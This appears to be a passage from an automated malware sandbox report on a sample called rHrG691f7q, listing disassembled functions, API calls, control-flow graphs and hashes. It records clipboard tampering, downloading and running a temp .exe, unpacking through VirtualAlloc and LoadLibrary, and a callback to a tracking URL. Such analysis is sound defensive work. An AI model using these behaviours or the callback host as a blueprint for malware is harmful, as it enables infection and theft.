                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                    • String ID: i
                                                                                                                                                                                                                                                                    • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                                    • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                    • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
                                                                                                                                                                                                                                                                    Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                    • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                                    • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                                    • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                    • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                                                    Function 009F9F46 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009F9F6E
                                                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 009F9F8E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction ID: 0fabc61ce2fd9ceaf5e346c2d7402b9798cf50747d8437352ec01e7698fc71f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F06D326007196FD7203BF9A98DB7EB6ECAF89725F100528E746D10C0DB70EC458B61
                                                                                                                                                                                                                                                                    Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 92 43d35e-43d364 83->92 84->83 94 43d162-43d16b GetFileType 85->94 95 43d0f7-43d100 85->95 96 43d1b4-43d1b7 94->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 94->97 99 43d102-43d106 95->99 100 43d137-43d15d GetLastError call 42ea93 95->100 104 43d1c0-43d1c6 96->104 105 43d1b9-43d1be 96->105 97->83 113 43d1a4-43d1af call 42eac9 97->113 99->100 101 43d108-43d135 call 43cd0a 99->101 100->83 101->94 101->100 106 43d1ca-43d218 call 4396c7 104->106 107 43d1c8 104->107 105->106 116 43d21a-43d226 call 43cf1b 106->116 117 43d228-43d24c call 43cabd 106->117 107->106 113->83 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->92 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 130 43d2d7-43d2db 127->130 131 43d35c 127->131 128->127 129 43d2aa-43d2be 128->129 129->127 130->131 133 43d2dd-43d310 CloseHandle call 43cd0a 130->133 131->92 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->131
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A
                                                                                                                                                                                                                                                                    Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 158 4332d5 144->158 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 164 4332d8-4332dd 158->164 161->162 163 432fcd-432fd1 161->163 162->164 163->156 167 432fd3-432fea 163->167 165->158 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 207 4331f0 175->207 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 183 4330c3-4330d3 177->183 184 433191-43319a call 43d365 177->184 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 183->184 185 4330d9-4330db 183->185 196 43320d 184->196 197 43319c-4331ae 184->197 185->184 189 4330e1-433107 185->189 189->184 193 43310d-433120 189->193 193->184 198 433122-433124 193->198 200 433211-433229 ReadFile 196->200 197->196 202 4331b0-4331bf GetConsoleMode 197->202 198->184 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 202->196 208 4331c1-4331c5 202->208 203->184 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->200 216 4331c7-4331e1 ReadConsoleW 208->216 209->164 210->184 220 433168-43316a 210->220 211->177 212->207 213->207 217 4332b2-4332b4 214->217 218 4331e9-4331ef call 42ea93 214->218 224 433236-433248 215->224 225 4331e3 GetLastError 216->225 226 433202-43320b 216->226 217->209 218->207 220->184 229 43316c-43318c 220->229 224->209 233 43324a-43324e 224->233 225->218 226->224 229->184 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 239 433274 call 432d95 238->239 240 43327e-433283 call 432a85 238->240 248 433279-43327c 239->248 240->248 247->209 248->247
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69
                                                                                                                                                                                                                                                                    Function 024C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 250 24c003c-24c0047 251 24c004c-24c0263 call 24c0a3f call 24c0e0f call 24c0d90 VirtualAlloc 250->251 252 24c0049 250->252 267 24c028b-24c0292 251->267 268 24c0265-24c0289 call 24c0a69 251->268 252->251 270 24c02a1-24c02b0 267->270 272 24c02ce-24c03c2 VirtualProtect call 24c0cce call 24c0ce7 268->272 270->272 273 24c02b2-24c02cc 270->273 279 24c03d1-24c03e0 272->279 273->270 280 24c0439-24c04b8 VirtualFree 279->280 281 24c03e2-24c0437 call 24c0ce7 279->281 283 24c04be-24c04cd 280->283 284 24c05f4-24c05fe 280->284 281->279 286 24c04d3-24c04dd 283->286 287 24c077f-24c0789 284->287 288 24c0604-24c060d 284->288 286->284 292 24c04e3-24c0505 LoadLibraryA 286->292 290 24c078b-24c07a3 287->290 291 24c07a6-24c07b0 287->291 288->287 293 24c0613-24c0637 288->293 290->291 294 24c086e-24c08be LoadLibraryA 291->294 295 24c07b6-24c07cb 291->295 296 24c0517-24c0520 292->296 297 24c0507-24c0515 292->297 298 24c063e-24c0648 293->298 303 24c08c7-24c08f9 294->303 299 24c07d2-24c07d5 295->299 300 24c0526-24c0547 296->300 297->300 298->287 301 24c064e-24c065a 298->301 304 24c0824-24c0833 299->304 305 24c07d7-24c07e0 299->305 306 24c054d-24c0550 300->306 301->287 302 24c0660-24c066a 301->302 309 24c067a-24c0689 302->309 311 24c08fb-24c0901 303->311 312 24c0902-24c091d 303->312 310 24c0839-24c083c 304->310 313 24c07e4-24c0822 305->313 314 24c07e2 305->314 307 24c0556-24c056b 306->307 308 24c05e0-24c05ef 306->308 315 24c056d 307->315 316 24c056f-24c057a 307->316 308->286 317 24c068f-24c06b2 309->317 318 24c0750-24c077a 309->318 310->294 319 24c083e-24c0847 310->319 311->312 313->299 314->304 315->308 320 24c057c-24c0599 316->320 321 24c059b-24c05bb 316->321 322 24c06ef-24c06fc 317->322 323 24c06b4-24c06ed 317->323 318->298 324 24c0849 319->324 325 24c084b-24c086c 319->325 333 24c05bd-24c05db 320->333 321->333 327 24c06fe-24c0748 322->327 328 24c074b 322->328 323->322 324->294 325->310 327->328 328->309 333->306
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction ID: fc6d8bf3b30f58ecec1e8ce670d687e404b49ad6cec5627aabf533009412aab4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D526C74A01229DFDBA4CF58C984BADBBB1BF09304F1480DAE54DAB351DB30AA95CF14
                                                                                                                                                                                                                                                                    Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                    • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
                                                                                                                                                                                                                                                                    Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                    • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9
                                                                                                                                                                                                                                                                    Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                                                    • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D
                                                                                                                                                                                                                                                                    Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                    • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C
                                                                                                                                                                                                                                                                    Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 449 42e185-42e188 436->449 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 448 42e178-42e184 call 42e03d 443->448 446 42e189-42e18e 444->446 447 42e169-42e175 GetLastError call 42ea93 444->447 452 42e190-42e193 446->452 453 42e195-42e197 446->453 447->443 448->449 452->453 453->448
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                    • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8
                                                                                                                                                                                                                                                                    Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 465 43477a-43477e 460->465 464 4347b3-4347c8 462->464 462->465 463->465 468 4347cd-4347d2 464->468 465->468
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
